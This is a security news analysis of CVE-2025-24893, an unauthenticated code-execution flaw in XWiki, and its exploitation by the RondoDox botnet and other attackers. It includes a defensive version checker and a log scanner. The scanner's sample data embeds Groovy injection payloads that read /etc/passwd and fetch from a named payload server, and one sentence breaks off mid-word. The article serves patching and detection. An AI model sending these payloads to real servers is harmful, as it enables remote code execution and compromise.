A critical security vulnerability in the XWiki Platform, tracked as CVE-2025-24893, is now being actively exploited by the RondoDox botnet malware, marking a significant escalation in a widespread attack campaign that also involves cryptocurrency miners and hands-on-keyboard attackers. The remote code execution flaw, which affects the platform’s `SolrSearch` feature, allows unauthenticated attackers to execute arbitrary code on unpatched servers. According to VulnCheck, exploitation attempts surged dramatically in early November 2025, with sharp peaks recorded on November 7 and 11, indicating broad scanning and attacks from multiple, independent threat actors [2]. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities catalog on October 30, 2025, setting a patching deadline of November 20 for federal agencies [1].
The situation exemplifies the challenges of modern patch management, as a vulnerability patched by XWiki maintainers in February 2025 is driving record exploitation surges nine months later [8]. The RondoDox botnet was first observed exploiting CVE-2025-24893 on November 3, 2025, and its operators have since begun renting out access to the compromised servers, creating a profitable botnet-for-rent service [9]. This rapid weaponization and monetization, occurring within approximately one week of the botnet’s adoption of the exploit, highlights the narrow window defenders have to respond to emerging threats.
Vulnerability Overview and Attack Mechanism
CVE-2025-24893 is an eval injection vulnerability in the XWiki Platform’s `SolrSearch` feature with a CVSS score of 9.8. The flaw allows unauthenticated guest users to execute arbitrary code on unpatched servers by sending a crafted request to the `/bin/get/Main/SolrSearch` endpoint. Affected versions include all releases prior to 15.10.11, 16.4.1, and 16.5.0RC1. The vulnerability was patched by XWiki maintainers in late February 2025, but many servers remain unpatched, creating a large attack surface for threat actors [1, 8].
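The affected-version statement above is easy to get wrong when an inventory mixes the 15.10.x LTS line, 16.x releases and release candidates. The following is an added example (not code from the article or from XWiki) that encodes the range as stated here: everything below 15.10.11 is affected, and every 16.x release below 16.4.1 is affected. It assumes XWiki's `major.minor.patch` version strings with an optional `RC`/`milestone` suffix, and conservatively treats a pre-release of a fixed version as unpatched. The host names in the inventory are hypothetical.

```python
"""Check whether an XWiki version string sits inside the CVE-2025-24893 affected range."""
import re

# Fixed releases as given in the advisory summary above. Assumption (from that summary):
# everything below 15.10.11 is affected, and every 16.x release below 16.4.1 is affected.
FIXED_15_BRANCH = (15, 10, 11, 1)
FIXED_16_BRANCH = (16, 4, 1, 1)

# major.minor[.patch] with an optional pre-release tag, e.g. "16.5.0RC1" or "16.0.0-milestone-2".
VERSION_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)(?:\.(?P<patch>\d+))?"
    r"(?P<pre>[-.]?(?:rc|milestone)[-.]?\d*)?$",
    re.IGNORECASE,
)


def parse_version(text):
    """Return (major, minor, patch, is_final). Pre-releases get is_final=0 so they sort below the final."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised XWiki version string: {text!r}")
    return (
        int(m.group("major")),
        int(m.group("minor")),
        int(m.group("patch") or 0),
        0 if m.group("pre") else 1,
    )


def is_vulnerable(text):
    """True if the version predates the fix on its branch (an RC of a fixed version is treated as unpatched)."""
    v = parse_version(text)
    if v < FIXED_15_BRANCH:
        return True
    return (16, 0, 0, 0) <= v < FIXED_16_BRANCH


def triage(inventory):
    """Map host -> version string to the sorted list of hosts that still need the upgrade."""
    return sorted(host for host, version in inventory.items() if is_vulnerable(version))


# Constructed inventory with hypothetical host names; not real scan data.
SAMPLE_INVENTORY = {
    "wiki-lts.example.internal": "15.10.10",
    "wiki-lts2.example.internal": "15.10.11",
    "wiki-new.example.internal": "16.3.0",
    "wiki-rc.example.internal": "16.5.0RC1",
    "wiki-old.example.internal": "14.10.21",
}

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: {SAMPLE_INVENTORY[host]} is affected by CVE-2025-24893; upgrade")
```

Feed it the version strings collected from your own XWiki instances; anything it returns from `triage` should be treated as exposed, and a version string it refuses to parse should be checked by hand rather than assumed safe.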
The exploitation chain typically involves injecting a Groovy script through the vulnerable endpoint. This script is used to fetch and execute a first-stage shell script from a payload server. For the RondoDox botnet, the initial payload is often downloaded from an IP address such as `74.194.191.52` [2, 5]. This script then downloads and installs the full RondoDox malware. The attack does not require authentication, making it particularly dangerous for exposed XWiki instances. Evidence suggests initial in-the-wild exploitation began as early as March 2025, shortly after the patch was released [8].
Security researchers have observed multiple exploitation patterns, including the use of public Nuclei templates that attempt to execute basic commands like `cat /etc/passwd` to confirm successful exploitation [1, 2]. Other attackers use out-of-band application security testing (OAST) services like `oast.fun` to identify vulnerable systems discreetly. The simplicity of the exploit, combined with the availability of public proof-of-concept code, has contributed to the rapid adoption by multiple threat groups.
Diverse Threat Actor Landscape
The exploitation of CVE-2025-24893 is no longer limited to a single threat group. The attacker set has diversified to include botnets, cryptocurrency miners, and actors using custom tooling for hands-on-keyboard attacks [2]. The RondoDox botnet campaign aims to recruit compromised servers into a distributed denial-of-service (DDoS) network, but has expanded its business model to include renting out access to these compromised systems to other cybercriminals [9]. This botnet-for-rent service represents an advanced, service-oriented criminal model that increases the overall threat level.
RondoDox attacks are easily identifiable through the botnet’s well-known HTTP User-Agent string `Mozilla/5.0 ([email protected])` and its distinctive payload naming convention using the pattern `rondo.
Perhaps more concerning are the hands-on-keyboard activities observed. An AWS-associated IP (`18.228.3.224`) with no prior abuse history attempted to establish a reverse shell using BusyBox `nc`, suggesting a potentially targeted attack rather than automated crimeware [2, 4]. Another reverse shell attempt originated from `118.99.141.178`, a host exposing QNAP and DrayTek interfaces that was likely already compromised via CVE-2023-47218, indicating that attackers are using previously breached devices as launch points for further attacks. This diversity of motives, from DDoS and mining to potential espionage, makes CVE-2025-24893 a high-value target for multiple criminal operations.
Detection and Mitigation Strategies
Organizations running XWiki instances should immediately upgrade to 15.10.11, 16.4.1, 16.5.0RC1, or a later release. Where patching cannot happen immediately, monitor for and block HTTP requests to the `/bin/get/Main/SolrSearch` endpoint whose URL-decoded parameters contain XWiki macro syntax such as `{{groovy}}`; the payload arrives URL-encoded in the query string, so decode it before matching. Security teams should also leverage indicators of compromise from these campaigns, including RondoDox’s distinctive User-Agent string and known payload server IPs like `74.194.191.52` [5, 8].
Intrusion detection systems should be tuned to the specific exploitation patterns and subsequent payload downloads associated with these campaigns, as Purple Ops recommends [8]. Security teams should assume compromise for any XWiki system that was exposed while unpatched and check for signs of infection, including unexpected processes, coin miners, or outgoing connections to the documented command and control servers.
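The monitoring advice above can be turned into a concrete retro-hunt over existing web-server logs. What follows is an added example written for this page, not tooling from the article, VulnCheck or XWiki. It assumes Apache/nginx combined log format, a small indicator set taken from this article (the `/bin/get/Main/SolrSearch` endpoint, `{{groovy}}`/`{{async}}` macro syntax, the `cat /etc/passwd` and `oast.fun` probe strings, and the three IPs named above; this is not a complete IoC feed), and, because the RondoDox User-Agent is reproduced on this page with its address obfuscated, it matches the shape `Mozilla/5.0 (<email-like token>)` rather than one literal string. The log lines are constructed sample data, including the payload contents and the `bot@example.invalid` address.

```python
"""Flag CVE-2025-24893 exploitation attempts and RondoDox indicators in combined-format access logs."""
import re
from urllib.parse import quote, unquote_plus, urlsplit

# Indicators taken from the campaign description above; the IP list is illustrative, not a full IoC feed.
SOLR_ENDPOINT = "/bin/get/Main/SolrSearch"
# XWiki macro syntax that never belongs in a search string; the public payloads wrap {{groovy}} in {{async}}.
MACRO_MARKERS = ("{{groovy", "{{/groovy", "{{async")
# Strings used by public Nuclei probes and OAST callbacks to confirm exploitation.
PROBE_MARKERS = ("/etc/passwd", "oast.fun")
# Payload server and hands-on-keyboard source addresses reported for this campaign.
KNOWN_IPS = {"74.194.191.52", "18.228.3.224", "118.99.141.178"}
# RondoDox's User-Agent is "Mozilla/5.0 (<email-like token>)"; match that shape rather than one literal.
RONDODOX_UA = re.compile(r"^Mozilla/5\.0 \([^\s()@]+@[^\s()@]+\)$")

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def decode_target(target):
    """Split the request target and URL-decode the query twice, since scanners often double-encode."""
    parts = urlsplit(target)
    return parts.path, unquote_plus(unquote_plus(parts.query))


def classify(line):
    """Return the list of indicators a log line triggers; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable line"]
    path, query = decode_target(m.group("target"))
    reasons = []
    if path.endswith(SOLR_ENDPOINT):
        if any(mk in query for mk in MACRO_MARKERS):
            reasons.append("groovy macro in SolrSearch request")
        if any(mk in query for mk in PROBE_MARKERS):
            reasons.append("recon probe in SolrSearch request")
        for ip in sorted(KNOWN_IPS):
            if ip in query:
                reasons.append(f"known payload host {ip} referenced in request")
    if m.group("src") in KNOWN_IPS:
        reasons.append(f"request from known campaign IP {m.group('src')}")
    if RONDODOX_UA.match(m.group("ua")):
        reasons.append("RondoDox-style User-Agent")
    return reasons


def scan(lines):
    """Return (source_ip, reasons) for each line that triggers at least one indicator."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group("src") if m else None, reasons))
    return hits


def _access_line(src, target, ua, ts="07/Nov/2025:10:12:01 +0000"):
    """Build one combined-format access log line. Sample data only; not a real capture."""
    return f'{src} - - [{ts}] "GET {target} HTTP/1.1" 200 512 "-" "{ua}"'


# Constructed query values shaped like the public probes, URL-encoded the way a scanner would send them.
_PROBE = quote('{{async async=false}}{{groovy}}println(new File("/etc/passwd").text){{/groovy}}{{/async}}', safe="")
_RONDO = quote('{{async async=false}}{{groovy}}println(new URL("http://74.194.191.52/").text){{/groovy}}{{/async}}', safe="")

SAMPLE_LOG = [
    _access_line("203.0.113.10", "/xwiki/bin/get/Main/SolrSearch?media=rss&text=release+notes",
                 "Mozilla/5.0 (X11; Linux x86_64)"),
    _access_line("198.51.100.23", f"/xwiki/bin/get/Main/SolrSearch?media=rss&text={_PROBE}",
                 "Mozilla/5.0 (compatible; scanner)"),
    _access_line("192.0.2.77", f"/xwiki/bin/get/Main/SolrSearch?media=rss&text={_RONDO}",
                 "Mozilla/5.0 (bot@example.invalid)"),
    _access_line("18.228.3.224", "/xwiki/bin/view/Main/", "curl/8.0"),
]

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_LOG):
        print(f"{src}: {'; '.join(reasons)}")
```

Run it over the real access logs from the XWiki front end (or its reverse proxy) for the period since March 2025; a hit on the macro or probe indicators means the endpoint was reached with an exploitation attempt and the host should be treated as potentially compromised, regardless of the HTTP status logged.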
The rapid escalation of this threat highlights the critical need for effective patch management processes. The fact that a vulnerability patched in February 2025 is driving significant exploitation in November demonstrates a substantial gap in security hygiene across many organizations. As one analysis noted, “By the time an issue lands in CISA KEV, attackers are already days ahead,” emphasizing the need for early-warning threat intelligence to level the playing field [2, 3]. Organizations should review their patch management lifecycle to reduce the time between vendor patches and production deployment.
The exploitation of CVE-2025-24893 by the RondoDox botnet and other threat actors represents a classic case of vulnerability weaponization in the modern threat landscape. The rapid escalation from targeted exploitation to widespread attacks, combined with the diversification of attacker motives and the emergence of a botnet-for-rent service, demonstrates how quickly threats can evolve. This incident serves as a reminder that effective security requires not just timely patching but also robust monitoring, threat intelligence integration, and the assumption that determined attackers will quickly weaponize any available vulnerability. The continued exploitation of this flaw months after a patch became available highlights persistent challenges in security hygiene that organizations must address to protect their infrastructure.